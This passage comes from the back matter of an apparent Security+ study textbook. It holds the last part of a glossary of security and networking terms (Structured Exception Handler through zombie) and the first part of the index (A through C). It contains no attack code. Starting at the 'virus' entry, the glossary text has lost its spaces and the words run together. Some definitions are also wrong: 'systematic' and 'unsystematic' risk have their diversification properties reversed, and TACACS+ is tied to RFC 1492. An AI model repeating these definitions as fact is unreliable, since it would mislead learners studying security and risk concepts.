Structured Exception Handler (SEH)  The process used to handle exceptions in the Windows OS core functions.
Structured Query Language (SQL)  A language used in relational database queries.
structured threat  A threat that has reasonable financial backing and can last for a few days or more. The organizational elements allow for greater time to penetrate and attack a system.
Structured Threat Information eXpression (STIX)  A standard XML schema for describing and exchanging threat information.
subnet mask  The information that tells a device how to interpret the network and host portions of an IP address.
subnetting  The creation of a network within a network by manipulating how an IP address is split into network and host portions.
Subscriber Identity Module (SIM)  An integrated circuit or hardware element that securely stores the International Mobile Subscriber Identity (IMSI) and the related key used to identify and authenticate subscribers on mobile telephones.
substitution  The switching of one value for another in cryptography.
supervisory control and data acquisition (SCADA)  A generic term used to describe the industrial control system networks used to interconnect infrastructure elements (such as manufacturing plants, oil and gas pipelines, power generation and distribution systems, and so on) and computer systems.
switch  A network device that operates at the data link layer of the OSI model.
switched port analyzer (SPAN)  A technology employed that can duplicate individual channels crossing a switch to another circuit.
symmetric encryption  Encryption that needs all parties to have a copy of the key, sometimes called a shared secret. The single key is used for both encryption and decryption.
SYN flood  A method of performing DoS by exhausting TCP connection resources through partially opening connections and letting them time out.
Synchronous Optical Network Technologies (SONET)  A set of standards used for data transfers over optical networks.
systematic risk  A form of risk that can be managed by diversification.
tangible asset  An asset for which a monetary equivalent can be determined. Examples are inventory, buildings, cash, hardware, software, and so on.
TCP wrappers  A host-based networking ACL system, used in some Linux systems to filter network access to Internet Protocol servers.
TCP/IP hijacking  An attack where the attacker intercepts and hijacks an established TCP connection.
Telnet  A network protocol used to provide cleartext bidirectional communication over TCP.
TEMPEST  The U.S. military’s name for the field associated with electromagnetic eavesdropping on signals emitted by electronic equipment. See also Van Eck phenomenon.
Temporal Key Integrity Protocol (TKIP)  A security protocol used in 802.11 wireless networks.
Terminal Access Controller Access Control System+ (TACACS+)  A remote authentication system that uses the TACACS+ protocol, defined in RFC 1492, and TCP port 49.
threat  Any circumstance or event with the potential to cause harm to an asset.
threat actor  The party behind a threat, although it may be a non-person as in an environmental issue.
threat vector  The method by which a threat actor introduces a specific threat.
three-way handshake  A means of ensuring information transference through a three-step data exchange. Used to initiate a TCP connection.
ticket-granting server (TGS)  A portion of the Kerberos authentication system.
ticket-granting ticket (TGT)  A part of the Kerberos authentication system that is used to prove identity when requesting service tickets.
Time-based One-Time Password (TOTP)  A password that is used once and is only valid during a specific time period.
time bomb  A form of logic bomb in which the triggering event is a date or specific time. See also logic bomb.
TKIP  See Temporal Key Integrity Protocol.
token  A hardware device that can be used in a challenge-response authentication process.
Transaction Signature (TSIG)  A protocol used as a means of authenticating dynamic DNS records during DNS updates.
Transmission Control Protocol (TCP)  The connection-oriented transport layer protocol for use on the Internet that allows packet-level tracking of a conversation.
Transport Layer Security (TLS)  A newer form of SSL that is now an Internet standard.
transposition  The rearrangement of characters by position as part of cryptographic operations.
trapdoor  See backdoor.
Trivial File Transfer Protocol (TFTP)  A simplified version of FTP used for low-overhead file transfers using UDP port 69.
Trojan  A form of malicious code that appears to provide one service (and may indeed provide that service) but that also hides another purpose. This hidden purpose often has a malicious intent. This code may also be referred to as a Trojan horse.
trunking  The process of spanning a single VLAN across multiple switches.
Trusted Automated eXchange of Indicator Information (TAXII)  An XML schema for the automated exchange of cyber indicators between trusted parties.
Trusted OS  An OS that can provide appropriate levels of security and has mechanisms to provide assurance of security function.
Trusted Platform Module (TPM)  A hardware chip to enable trusted computing platform operations.
tunneling  The process of packaging packets so that they can traverse a network in a secure, confidential manner.
Unified Extensible Firmware Interface (UEFI)  A specification that defines the interface between an OS and the hardware firmware. This is a replacement to BIOS.
unified threat management (UTM)  The aggregation of multiple network security products into a single appliance for efficiency purposes.
Uniform Resource Identifier (URI)  A set of characters used to identify the name of a resource in a computer system. A URL is a form of URI.
Uniform Resource Locator (URL)  A specific character string used to point to a specific item across the Internet.
uninterruptible power supply (UPS)  A source of power (generally a battery) designed to provide uninterrupted power to a computer system in the event of a temporary loss of power.
Universal Serial Bus (USB)  An industry-standard protocol for communication over a cable to peripherals via a standard set of connectors.
unshielded twisted-pair (UTP)  A form of network cabling in which pairs of wires are twisted to reduce crosstalk. Commonly used in LANs.
unstructured threat  A threat that has no significant resources or ability—typically an individual with limited skill.
unsystematic risk  Risk that cannot be mitigated by diversification. Unsystematic risks can result in loss across all types of risk controls.
usage auditing  The process of recording who did what and when on an information system.
user acceptance testing (UAT)  The application of acceptance-testing criteria to determine fitness for use according to end-user requirements.
User Datagram Protocol (UDP)  A protocol in the TCP/IP protocol suite for the transport layer that does not sequence packets—it is “fire and forget” in nature.
user ID  A unique alphanumeric identifier that identifies individuals when logging into or accessing a system.
UTP  See unshielded twisted-pair.
vampire tap  A tap that connects to a network line without cutting the connection.
Van Eck phenomenon  Electromagnetic eavesdropping through the interception of electronic signals emitted by electrical equipment. See also TEMPEST.
video teleconferencing (VTC)  A business process of using video signals to carry audio and visual signals between separate locations, thus allowing participants to meet via a virtual meeting instead of traveling to a physical location. Modern video conferencing equipment can provide very realistic connectivity when lighting and backgrounds are controlled.
Vigenère cipher  A polyalphabetic substitution cipher that depends on a password.
virtual local area network (VLAN)  A broadcast domain inside a switched system.
virtual private network (VPN)  An encrypted network connection across another network, offering a private communication channel across a public medium.
virtualization desktop infrastructure (VDI)  The use of servers to host virtual desktops by moving the processing to the server and using the desktop machine as merely a display terminal. VDI offers operating efficiencies as well as cost and security benefits.
virusAformofmaliciouscodeorsoftwarethatattachesitselftootherpiecesofcodeinordertoreplicate.Virusesmaycontainapayload,whichisaportionofthecodethatisdesignedtoexecutewhenacertainconditionismet(suchasonacertaindate).Thispayloadisoftenmaliciousinnature.
vishingPhishingovervoicecircuits,specificallyvoiceoverIP(VoIP).
voiceoverIP(VoIP)Thepacketizedtransmissionofvoicesignals(telephony)overInternetProtocol.
vulnerabilityAweaknessinanassetthatcanbeexploitedbyathreattocauseharm.
WAPSeeWirelessApplicationProtocol.
war-dialingAnattacker’sattempttogainunauthorizedaccesstoacomputersystemornetworkbydiscoveringunprotectedconnectionstothesystemthroughthetelephonesystemandmodems.
war-drivingTheattemptbyanattackertodiscoverunprotectedwirelessnetworksbywandering(ordriving)aroundwithawirelessdevice,lookingforavailablewirelessaccesspoints.
warmsiteAbackupsite,offpremises,thathashardwarebutisnotconfiguredwithdataandwilltakesometimetoswitchoverto.
WassenaarArrangementAsetofrulesandregulationsconcerningdual-usetechnologies,includingcryptography.Theserulesarerelatedtoarmstradingandsimilarnationalsecurityconcernsandimpactsomecybersecurityelements.
webapplicationfirewall(WAF)Afirewallthatoperatesattheapplicationlevel,specificallydesignedtoprotectwebapplicationsbyexaminingrequestsattheapplicationstacklevel.
WEPSeeWiredEquivalentPrivacy.
whalingThetargetingofhigh-valueindividuals.
whiteboxtestingAformoftestingwherethetesterhasknowledgeoftheinnerworkingsofasystem.
whitelistingAlistingofitemstobeallowedbyspecificinclusion.Theoppositeofblacklisting.
wideareanetwork(WAN)Anetworkthatspansalargegeographicregion.
Wi-FiProtectedAccess(WPA/WPA2)Aprotocoltosecurewirelesscommunicationsusingasubsetofthe802.11istandard.
Wi-FiProtectedSetup(WPS)Anetworksecuritystandardthatallowseasysetupofawirelesshomenetwork.
WiredEquivalentPrivacy(WEP)Theencryptionschemeusedtoattempttoprovideconfidentialityanddataintegrityon802.11networks.
wirelessaccesspoint(WAP)Anetworkaccessdevicethatfacilitatestheconnectionofwirelessdevicestoanetwork.
WirelessApplicationProtocol(WAP)Aprotocolfortransmittingdatatosmallhandhelddevicessuchascellularphones.
wirelessintrusiondetectionsystem(WIDS)Anintrusiondetectionsystemestablishedtocoverawirelessnetwork.
wirelessintrusionpreventionsystem(WIPS)Anintrusionpreventionsystemestablishedtocoverawirelessnetwork.
WirelessTransportLayerSecurity(WTLS)TheencryptionprotocolusedonWAPnetworks.
wormAnindependentpieceofmaliciouscodeorsoftwarethatself-replicates.Unlikeavirus,itdoesnotneedtobeattachedtoanotherpieceofcode.Awormreplicatesbybreakingintoanothersystemandmakingacopyofitselfonthisnewsystem.Awormcancontainadestructivepayloadbutdoesnothaveto.
writeblockerAspecificinterfaceforastoragemediathatdoesnotpermitwritingtooccurtothedevice.Thisallowscopiestobemade
withoutalteringthedevice.
X.500ThestandardformatfordirectoryservicesincludingLDAP.
X.509Thestandardformatfordigitalcertificates.
XMLSeeExtensibleMarkupLanguage.
XSRFSeecross-siterequestforgery.
XSSSeecross-sitescripting.
zero-dayAnamegiventoavulnerabilitywhoseexistenceisknown,butnottothedeveloperofthesoftware,henceitcanbeexploitedbeforepatchesaredevelopedandreleased.
zombieAmachinethatisatleastpartiallyunderthecontrolofabotnet.
INDEX
Symbols
*-property (star property), enforced by Bell-LaPadula, 34–35

Numbers
1G mobile networks, 339
2.4 GHz band, Bluetooth, 344
2G mobile networks, 339
3DES (Triple DES)
  database encryption, 123
  IPsec using, 327
  overview of, 104–105
  SSH and, 322
  supported by WTLS, 340
  used for SSL/TLS encryption, 533
3G mobile networks, 339, 342
4G mobile networks
  comparing with 3G and LTE, 342
  features of, 339
  overview of, 343
5 GHz band, IEEE 802.11a, 348–349
A
AAA (authentication, authorization, and accounting)
  Diameter, 314
  overview of, 305
  RADIUS (Remote Authentication Dial-In User Service), 312–314
  TACAS+ (Terminal Access Controller Access Control System+), 314–317
AACS (Advanced Access Content System), 122
ABAC (attribute-based access control), 303–304
acceptable use policy (AUP)
  BYOD concerns, 369
  human resources policies, 49–50
access control
  ABAC (attribute-based access control), 303–304
  account and password expiration and, 297
  authentication and, 32
  authentication compared with, 311
  CompTIA Security+ Exam Objectives, 752–753
  DAC (discretionary access control), 302
  device configuration, 442–443
  electronic access control systems, 197–198
  Group Policy, 32–33
  Group Policy blocking device access, 451–452
  isolation of system, 13
  MAC (mandatory access control), 301
  mobile device security and, 365–366
  network access control, 267–268
  overview of, 31–32
  password policy, 33
  physical security and, 61–63, 196
  RBAC (role-based access control), 303
  remote access and, 311
  rule-based access control, 303
access control lists. See ACLs (access control lists)
access control matrix, 300–301
access points. See APs (access points)
access tokens
  biometrics, 211–213
  false positives and false negatives, 213–214
  something you have, 210
accounting, configuration status accounting, 640
accounting, in AAA process
  overview of, 305
  RADIUS (Remote Authentication Dial-In User Service), 314
  TACAS+ (Terminal Access Controller Access Control System+), 317
accounts
  administrative. See administrators
  controlling UNIX accounts, 418
  expiration, 297, 304
  generic, 290
  group. See groups
  logon restrictions (time of day), 295
  user. See users/user accounts
ACK packets, in TCP three-way handshake, 228–229
ACLs (access control lists)
  dealing with unauthorized access, 282
  for machine security, 441
  mechanisms firewalls are based on, 262
  overview of, 300–301
  routers using, 259
ACM (Association for Computing Machinery), code of ethics, 48
ACs (Attribute Certificates), 169–170
Active Server Pages (ASP), 547
active vs. passive tools, 402–403
ActiveX, 545–546
Adams, Carlisle, 105–106
add-ons, malicious, 551
Additional Decryption Key (ADK), in PGP, 521
Address Resolution Protocol (ARP)
  ARP attacks. See ARP poisoning
  finding MAC addresses, 233–234
address space
  classes of, 237
  comparing IPv4 and IPv6, 232
  private, 237
ADK (Additional Decryption Key), in PGP, 521
Adleman, Leonard, 110–111
administrative law, 698
administrators
  backups as key responsibility of, 591
  functions of, 453
  special user accounts, 290
Administrators group, 291
Advanced Access Content System (AACS), 122
Advanced Encryption Standard. See AES (Advanced Encryption Standard)
Advanced Mobile Phone System (AMPS), 339
advanced persistent threats. See APTs (advanced persistent threats)
adware, 471–472
AES (Advanced Encryption Standard)
  database encryption, 123
  file system encryption, 123
  overview of, 105
  S/MIME and, 178
  SSH and, 322
  support in WPA2, 354
affinity groupings, tools for risk management, 625
agile model, for software development, 559
AH (Authentication Header)
  in IPsec, 182–183
  for traffic security, 327–329
AIM (AOL Instant Messenger), 522
air conditioning. See HVAC (heating, ventilation, and air conditioning)
alarms, in physical security, 199–200
ALE (annualized loss expectancy)
  in calculating risks, 622–624
  defined, 611
alerts, regarding new threats and security trends, 57–58
algorithms
  asymmetric. See asymmetric encryption
  comparative strength and performance of, 93
  in contemporary encryption, 96–97
  hashing functions. See hashing algorithms
  key management, 98
  random numbers in, 98
  symmetric. See symmetric encryption
  used in PGP, 181
  uses of, 116–117
AMPS (Advanced Mobile Phone System), 339
analysis engine
  decision trees used by, 390
  in HIDSs, 389
  in IDSs, 379
  in NIDSs, 384
analysis phase, computer forensics, 684
Android OS, hardening, 456
annualized loss expectancy (ALE)
  in calculating risks, 622–624
  defined, 611
annualized rate of occurrence (ARO)
  in calculating risks, 623–624
  defined, 611
anomaly detection model, IDS models, 379–380
anonymity, wireless attacks and, 351
anonymizing proxy, 270
anonymous FTP (blind FTP), 540
antennas
  placement, 360–361
  types, 359–360
antimalware products
  overview of, 426–427
  polymorphic malware avoiding detection, 469
antispam products, 430–431
antispyware products, 431–432
antivirus (AV) products
  BYOD concerns, 367
  host hardening, 427–430
  malware defenses, 473
AOL Instant Messenger (AIM), 522
APIs (application programming interfaces), 132
App Sandbox, hardening Mac OS X, 422
Apple Application firewall, 422
AppleTalk protocol, 224
appliances, in NIDSs, 384
application control, integrated into host-based IPS, 394
application firewalls, 458
application layer proxies, 262–263
application programming interfaces (APIs), 132
application vulnerability scanners, 449
applications. See also software
  application-level attacks, 473–474, 572
  blacklisting, 430, 434, 515
  CompTIA Security+ Exam Objectives, 749–752
  configuration baseline, 579
  cryptographic, 122–123
  mobile application security, 370–372
  patch management, 579
  program viruses, 467
  updates, 426
  vulnerabilities, 474
  web application vulnerabilities, 552–553
  whitelisting, 371, 434
applications, hardening
  configuration baseline, 444
  host software baselines, 448–449
  overview of, 444
  patch management, 445–448
  patches, 444–445
  software development and, 578–579
AppLocker, for user account control, 434–435
APs (access points)
  attacks on, 351
  IEEE 802.11 and, 349–350
  rogue access points, 82, 352–353
APTs (advanced persistent threats)
  in current threat environment, 5
  model of, 654
  RATs (remote access trojans) and, 496
  signs of, 495
  steps in maintaining a presence on network, 653
architectures
  BYOD concerns, 369
  network, 221–222
ARL (authority revocation list), 142
ARO (annualized rate of occurrence)
  in calculating risks, 623–624
  defined, 611
ARP (Address Resolution Protocol)
  ARP attacks, 234
  finding MAC addresses, 233–234
ARP poisoning
  attacks on switches, 258
  overview of, 490
  types of ARP attacks, 234
ASA (Attack Surface Analyzer), hardening Windows OSs, 416–417
ASCII, canonical form and, 570
Asian privacy laws, 729–730
ASP (Active Server Pages), 547
ASP.NET, 547
assertion service, XKMS, 178
assets
  defined, 610
  identifying in risk management model, 616
Association for Computing Machinery (ACM), code of ethics, 48
association, in IEEE 802.11 AP, 349
associative (real or physical) evidence, 676
assurance, 92
asymmetric encryption. See also by individual asymmetric algorithms
  DH (Diffie-Hellman), 109–110
  ECC (Elliptic curve cryptography), 112–113
  ElGamal, 111–112
  how PGP works, 180
  overview of, 109–110
  in PGP suite, 122–123
  RSA (Rivest, Shamir, and Adleman), 110–111
  tokens and, 297
  vs. symmetric, 113
ATM (Asynchronous Transfer Mode)
  cells, 225
  network protocol, 224
  tunneling, 246–247
attachments, e-mail
  as attack vector, 577
  MIME handling, 508–509
Attack Surface Analyzer (ASA), hardening Windows OSs, 416–417
attacks. See also by individual types; threats
  on address system (IP addresses), 487–488
  adware, 471–472
  APT (advanced persistent threat), 495
  attack surface area minimization, 560–561
  auditing and, 497–499
  avenues of, 465–466
  backdoors and trapdoors, 472–473
  botnets, 471–472
  cache poisoning, 488–490
  client-side, 493–494
  DoS (denial-of-service), 474–477
  on encryption, 486–487
  logic bombs, 471
  malware defenses, 473–474
  malware (malicious code), 466
  man-in-the-middle, 483–484
  minimizing avenues of, 12–13
  null sessions (Windows OSs) and, 478
  overview of, 464
  pass-the-hash, 492
  password guessing, 490–492
  phishing and pharming, 485–486
  polymorphic malware, 469
  ransomware, 473
  RATs (remote access trojans), 496
  remediation actions, 684
  replay, 484
  review and Q&A, 500–503
  rootkits, 470–471
  scanning, 486
  sniffing, 479
  social engineering, 478
  software exploitation, 492–493
  spam, 484
  spim, 485
  spoofing, 480–482
  spyware, 471
  SSL/TLS, 534
  TCP/IP hijacking, 483
  tools used in, 496–497
  transitive access and, 484
  Trojan horses, 470
  types of, 652–654
  viruses, 466–468
  war-dialing and war-driving, 477–478
  worms, 469
attribute-based access control (ABAC), 303–304
Attribute Certificates (ACs), 169–170
auditing
  configuration status auditing, 640
  overview of, 497–498
  performing routinely, 498–499
  security logs and, 391
  users and groups, 290
auditing, basic security goals, 20
AUP (acceptable use policy)
  BYOD concerns, 369
  human resources policies, 49–50
authentication
  in AAA process, 305
  access control compared with, 311
  account and password expiration and, 297
  basic authentication, 307
  biometrics and, 62–63
  captive portals handling on wireless networks, 362
  CompTIA Security+ Exam Objectives, 752–753
  digest authentication, 307–308
  domain password policy, 293–294
  group level, 291–292
  Group Policy, 32–33
  IPsec (IP Security), 182–183
  Kerberos, 308–309
  managing access by roles, 292
  mechanisms and policies, 32
  mobile application security, 371–372
  multifactor authentication, 214–215, 307–308
  mutual authentication, 307–308
  overview of, 289
  password policies, 33, 292–293
  privilege management, 288–289
  remote access and, 306–307
  review and Q&A, 331–335
  as security goals, 20
  in SSL/TLS, 533
  SSO (single sign-on), 294–295
  TACAS+ (Terminal Access Controller Access Control System+), 315–316
  time of day restrictions, 295–296
  token use in, 296–297, 307–308
  user level, 289–291
  uses of cryptography, 116–117
  in WPA, 354
  X.500 standard and, 172
Authentication Header (AH)
  in IPsec, 182–183
  for traffic security, 327–329
authentication protocols
  CHAP (Challenge-Handshake Authentication Protocol), 320
  EAP (Extensible Authentication Protocol), 319–320
  L2TP (Layer 2 Tunneling Protocol), 320–321
  NTLM (NT LAN Manager), 320
  overview of, 317
  PAP (Password Authentication Protocol), 320
  PPP (Point-to-Point Protocol), 317–318
  PPTP (Point-to-Point Tunneling Protocol), 318–319
  SSH (Secure Shell), 321–322
  Telnet, 321
  tunneling protocols, 317–318
Authenticode, code security and, 545–546
authority revocation list (ARL), 142
authorization
  in AAA process, 305
  RADIUS (Remote Authentication Dial-In User Service), 314
  remote access and, 310–311
  TACAS+ (Terminal Access Controller Access Control System+), 316–317
Automatic Updates, Windows 7, 424–426
autoplay, 201–202
AV (antivirus) products. See antivirus (AV) products
availability
  in CIA, 20
  hosts and, 254–255
  importance of, 253
  measuring in risk calculation, 625
B
back-out plans
  in change management, 642
  in disaster recovery, 601
backdoors
  in old school attacks, 652
  overview of, 472–473
  unauthorized access via, 82
BackTrack, toolsets related to attacks, 496
backup power sources, 209
backups
  alternative sites, 596–597
  back-out plan, 642
  data backups, 45
  frequency and retention, 594–596
  overview of, 591–592
  storage, 596
  strategies, 592–594
bandwidth, demand for data services and, 339
banking rules and regulations (U.S.), 724–725
banner grabbing, 403–404
Basel Committee, on risks, 614
baselines
  application configuration, 579
  configuration baseline, 444
  configuration identification and, 639
  defined, 409
  host software, 437, 448–449
  identifying and analyzing in risk management, 626
  system hardening, 409
  UNIX, 417–419
basic input/output system (BIOS), physical security and, 200–201
batch mode, HIDSs operating in, 388
BC (business continuity)
  BCP (business continuity plan), 585
  BIA (business impact analysis), 586
  continuity of operations, 587
  disaster recovery. See disaster recovery
  identifying critical systems, 586
  overview of, 584–585
  removing single points of failure, 586
  review and Q&A, 604–607
  risk assessment, 586
  succession planning, 586–587
BCP (business continuity plan), 585
Bcrypt, key stretching, 120
beacon frames, in IEEE 802.11, 349
Bell-LaPadula model, for confidentiality, 34–35
best evidence rule, 677
best practices
  incident response, 664, 667–668
  risk management, 627–629
  security compliance, 56
BIA (business impact analysis), 586, 588–589
Biba, Kenneth, 35
Biba model, for integrity, 36
Big Data, computer forensics and, 690
biometrics, physical access controls, 62–63, 211–213
BIOS (basic input/output system), physical security and, 200–201
birthday attacks, 492
BitLocker
  file system encryption, 123
  hardening Windows OSs, 413–415
black-box testing, in software development, 567
black-hat hacking, 497
blacklisting
  antispam products, 430
  filtering/blacklisting spam senders, 515
  host hardening, 434
blind FTP (anonymous FTP), 540
block ciphers
  AES (Advanced Encryption Standard), 105
  Blowfish and Twofish, 107
  CAST (Carlisle Adams and Stafford Tavares), 105–106
  DES (Data Encryption Standard), 104
  IDEA (International Data Encryption Algorithm), 107–108
  RC2, RC5, and RC6, 106
  vs. stream ciphers, 108
Blowfish, 107, 322
blu-ray discs, 280
Bluebugging attacks, 346
Bluejacking attacks, 345
Bluesnarfing attacks, 346
Bluetooth
  attacks, 345–346
  hardening mobile devices, 455–456
  introduction to wireless networks, 337
  overview of, 343–345
  security issues, 65
  versions, 345
Bluetooth DOS attacks, 346
body, in e-mail structure, 506–508
bollards, in physical security, 195
boot loaders, virtualization compared with, 254
boot sector viruses, 467
bootdisk attacks, 192–194
botnets
  overview of, 471–472
  researching spam incidence, 514
BPAs (business partnership agreements), 59
brandjacking, client-side attacks, 494
Brewer-Nash confidentiality model, 35
bridge CAs, hybrid trust model and, 160
bridges, 257–258
Bring Your Own Device (BYOD)
  concerns, 366–370
  human resources policies, 52
browsers
  certificate use by, 535
  HTTP and HTTPS for data transfer, 537–539
  Java and, 543
  malware, 551
  plug-ins, 550–551
  securing, 546
  SSL/TLS setup options, 532
brute-force attacks
  password guessing, 491–492
  password strength and, 294
buffer-overflow attacks
  overview of, 575–576
  software exploits, 493
  string handling and, 569
  on web components, 542
bugs
  change management and, 636
  tracking in software development, 571–572
Burp Suite, 497
bus topology, network topologies, 222
business continuity. See BC (business continuity)
business continuity plan (BCP), 585
business impact analysis (BIA), 586, 588–589
business partners, on-boarding/off-boarding, 49
business partnership agreements (BPAs), 59
business processes, risk management and, 612
business risks, 613
BYOD (Bring Your Own Device)
  concerns, 366–370
  human resources policies, 52
C
CA certificates, 136–137
cable modems, 265–266
cable, wire speed, 395
cache poisoning, 488–490
caching proxy, 270
CACs (Common Access Cards), types of tokens, 296
California Senate Bill 1386 (SB 1386), 724
cameras, in access control. See CCTV (closed circuit TV)
campus area networks (CANs), network architectures, 221
campus networks. See also intranet, 242
CAN-SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act), 514, 701–702
Canadian privacy laws, 729
canonicalization errors, 569–570
CANs (campus area networks), network architectures, 221
Capability Maturity Model Integration (CMMI), 644–645
captive portals, handling authentication on wireless networks, 362
Carlisle Adams and Stafford Tavares. See CAST (Carlisle Adams and Stafford Tavares)
CAs (certificate authorities)
  certificate revocation, 139–141
  certificate verification and trust, 143–146
  choosing between public and in-house CAs, 152–153
  CPS (certification practices statement), 131
  hierarchical trust model and, 157
  in house CAs, 152–153
  outsourced CAs, 153–154
  overview of, 130–131
  peer-to-peer trust model, 158–159
  PKIX standard and, 168
  public CAs, 151–152
  responsibilities of, 169
  root CAs, 157
  services provided by, 129
  trusting, 131
  tying different PKIs together, 154–155
case (common) law, 698–699
CAST (Carlisle Adams and Stafford Tavares)
  algorithms used in PGP, 181
  overview of, 105–106
  SSH and, 322
Category 3 (Cat 3), twisted pair cable, 275
Category 5 (Cat 5), twisted pair cable, 275
Category 6 (Cat 6), twisted pair cable, 275
cause and effect analysis, in risk management, 626
CC (Common Criteria for Information Technology Security)
  overview of, 184
  Trusted OSs, 434–435
CCB (change control board), 642–643
CCMP (Counter Mode with Cipher Block Chaining-Message Authentication Codes Protocol)
  current security methods, 359
  in WPA2, 355
CCTV (closed circuit TV)
  for access control, 198–199
  physical access controls, 196
  unlicensed bands and, 349
CDIs (constrained data items), in Clark-Wilson security model, 37
CDs (compact disks)
  autoplay, 201
  bootdisk attacks, 192–194
  CD-R (compact disc-recordable), 279–280
  CD-RW (compact disc-rewriteable), 280
cells, ATM, 225
cellular phones. See mobile devices
centralized PKI infrastructures, 146–147
CEP (Certificate Enrollment Protocol), in certificate management, 168, 183
CER (crossover error rate), 213–214
CERT (Computer Emergency Response Team), 651–652
certificate authorities. See CAs (certificate authorities)
certificate-based threats, 160–161
Certificate Enrollment Protocol (CEP), in certificate management, 168, 183
certificate extensions, 135–136
Certificate Management Protocol (CMP), 176
certificate path, 157–158
certificate policy (CP), 152
certificate repositories, 143, 170
certificate revocation lists. See CRLs (certificate revocation lists)
certificate servers, 131
certificate signing request (CSR), 138
certificate verification, 143–146
certificates. See digital certificates
certification practices statements (CPSs)
  areas addressed by PKIX model, 169
  CAs and, 131
CFAA (Computer Fraud and Abuse Act)
  overview of, 701–702
  privacy objectives of, 721–722
  statutory laws controlling computer crime, 699
CGI (Common Gateway Interface), 546
chain of custody, evidence, 684
Challenge-Handshake Authentication Protocol (CHAP)
  authentication mechanisms in PPP, 318
  overview of, 320
challenge/response system, in blocking spam, 516
change control board (CCB), 642–643
change management
  back-out plan, 642
  CCB (change control board), 642–643
  change management policy, 44–45
  CMMI (Capability Maturity Model Integration), 644–645
  code integrity and, 643–644
  defined, 635
  implementing, 640–642
  need for, 635–637
  overview of, 634–635
  phases of configuration management, 639–640
  review and Q&A, 646–649
  risk mitigation and, 614–615
  scope of, 636
  separation of duties and, 637–638
changes, types of, 637
CHAP (Challenge-Handshake Authentication Protocol)
  authentication mechanisms in PPP, 318
  overview of, 320
chat programs. See IM (instant messaging)
checksums, analysis of data stream for changes, 685
Children’s Online Privacy Protection Act (COPPA), 722
China
  APT attack on U.S. firms, 5
  nation-state hacking, 7
  Operation Night Dragon attack originating from, 7
  power grid attacks and, 4
  spying by, 5
choice, responsible collection of PII, 719
chosen-plaintext attack, 340
Christmas attack, 486
CIA (confidentiality, integrity, and availability)
  cryptography and, 116–117
  overview of, 20
cipher suites
  TLS Cipher Suite Registry, 174
  uses of cryptography, 117
ciphers. See also algorithms
  in contemporary encryption, 96–97
  defined, 90
  strong vs. weak, 117
ciphertext
  attacks on encryption, 486
  encrypting plaintext into, 90
  historical perspectives on cryptography, 94
CIRT (Computer Incident Response Team), 651–652
Citibank attack (June-October 1994), 2
Clark-Wilson integrity model, 36–37
Class 1 certificates, 132
Class 2 certificates, 132
Class 3 certificates, 132
Class A addresses, 237
Class B addresses, 237
Class C addresses, 237
classification
  in Bell-LaPadula security model, 34–35
  hardening Windows Server 2012, 415
  of information in data policy, 45–46
  U.S. government security labels, 302
clean-agent fire suppression systems, 206
clean desk policies, 52, 83
click fraud, 697
client/server architecture
  client-side attacks, 493–494, 554, 577
  networking and, 222
  RADIUS, 312
  server-side scripts, 547
  server-side vs. client-side validation, 579–580
closed circuit TV. See CCTV (closed circuit TV)
cloud computing
  computer forensics and, 690
  disaster recovery and, 599
  overview of, 283–284
  risks associated with, 629
  storing data, 440
clusters/clustering
  fault tolerance from, 600–601
  free space, slack space, and allocated space, 686
CMMI (Capability Maturity Model Integration), 644–645
CMP (Certificate Management Protocol), 176
CMS (Cryptographic Message Syntax)
  S/MIME and, 179
  triple-encapsulated messages, 180
coaxial cable, 274
Cobalt Strike toolset, 497
code
  arbitrary/remote code execution, 578
  code signing, 546, 551–552
  coding phase of software development, 562–566
  injection attacks. See injection attacks
  integrity, 643–644
  malicious. See malware (malicious code)
  reducing vulnerabilities in, 563
  secure coding concepts, 568
  web components vulnerabilities, 541–542
code of ethics, human resource policies, 47–48
Code Red worm
  buffer-overflow attacks, 575
  historical security incidents, 3
COFEE (Computer Online Forensics Evidence Extractor), 679
cold sites, alternative backup sites, 597
collaborative development, change management and, 636
collision attacks, compromising hash algorithms, 99
collision domains, hubs and switches and, 257
command injection attacks, 575
Common Access Cards (CACs), types of tokens, 296
common (case) law, 698–699
Common Criteria for Information Technology Security (CC)
  overview of, 184
  Trusted OSs, 434–435
Common Gateway Interface (CGI), 546
Common Vulnerabilities and Exposures. See CVE (Common Vulnerabilities and Exposures)
Common Weakness Enumeration. See CWE (Common Weakness Enumeration)
communications security (COMSEC), 19
community clouds, 284
compact disks. See CDs (compact disks)
competent evidence, 677
complete mediation, Saltzer and Schroeder’s eight principles of security design, 27
compliance
  CompTIA Security+ Exam Objectives, 741–745
  with laws, best practices and standards, 56
  training and, 58
  web security gateways providing, 271
CompTIA Security+ Exam Objectives
  access control and identity management, 752–753
  application, data, and host security, 749–752
  compliance and operational security, 741–745
  cryptography, 753–755
  network security, 738–740
  threats and vulnerabilities, 745–749
Computer Emergency Response Team (CERT), 651–652
computer forensics
  acquiring evidence, 679–681
  analysis phase, 684
  BYOD concerns, 367–368
  chain of custody, 684
  conducting investigations, 682–683
  device forensics, 688
  e-discovery, 689–690
  ensuring data is not modified, 685
  file systems, 685–687
  host forensics, 685
  identifying evidence, 681
  metadata and, 687–688
  network forensics, 689
  overview of, 674–675
  process of, 677–679
  protecting evidence, 681
  review and Q&A, 691–695
  rules regarding evidence, 677
  standards for evidence, 676–677
  storing evidence, 682
  transporting evidence, 682
  types of evidence, 675–676
Computer Fraud and Abuse Act. See CFAA (Computer Fraud and Abuse Act)
Computer Incident Response Team (CIRT), 651–652
computer mischief, 699
Computer Online Forensics Evidence Extractor (COFEE), 679
computer security, introduction
  approaches to securing systems, 13
  criminal organizations, 10
  current threats, 4–7
  defined, 1
  ethics, 14
  historical incidents, 1–4
  insiders, 9–10
  intruders, 9
  minimizing avenues of attack, 12–13
  nation-states, terrorists, and information warfare, 10–11
  reference materials, 14
  review and Q&A, 15–17
  specific and opportunistic targets, 12
  trends, 11–12
  viruses and worms, 8
computer software configuration items, 639
computer trespass, 699
COMSEC (communications security), 19
concentrators
  in traffic management, 264
  VPN concentrator, 266–267
Conficker, 4
confidential information, 46
confidentiality
  in CIA, 20, 116–117
  IPsec and, 182–183
  uses of cryptography, 116
  WEP and, 350
  WTLS and, 340
confidentiality models
  Bell-LaPadula model, 34–35
  Brewer-Nash model, 35
  overview of, 34
configuration baseline, application hardening, 444, 579
configuration control, 614–615, 640
configuration identification, 639
configuration items, 639
configuration management. See also change management
  defined, 635
  host security, 23
  phases of, 639–640
configuration status accounting, 640
configuration status auditing, 640
confusion, secrecy principles, 120
connection-oriented protocols, 228
connectionless protocols, 228
connections, for remote access and authentication protocols, 330
consent, in responsible collection of PII, 719
